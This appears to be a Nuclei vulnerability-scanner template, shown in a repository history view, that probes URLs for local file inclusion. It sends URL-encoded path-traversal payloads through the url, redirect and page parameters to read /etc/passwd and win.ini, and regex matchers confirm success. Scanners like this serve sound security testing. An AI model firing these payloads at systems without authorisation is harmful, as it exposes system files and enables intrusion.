nuclei-templates/fuzzing/arbitrary-file-read.yaml

30 lines
1.0 KiB
YAML
Raw Normal View History

2020-09-02 22:22:30 +00:00
id: arbitrary-file-read
info:
name: Arbitrary File Read
author: Sushant Kamble (https://in.linkedin.com/in/sushantkamble)
severity: high
description: Searches for /etc/passwd on passed URLs.
2021-04-02 13:54:37 +00:00
tags: fuzz,lfi
2020-09-02 22:22:30 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
- "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
2020-10-02 16:52:52 +00:00
- "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
- "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini"
- "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
- "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
matchers-condition: and
2020-09-02 22:22:30 +00:00
matchers:
2020-10-02 16:52:52 +00:00
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
part: body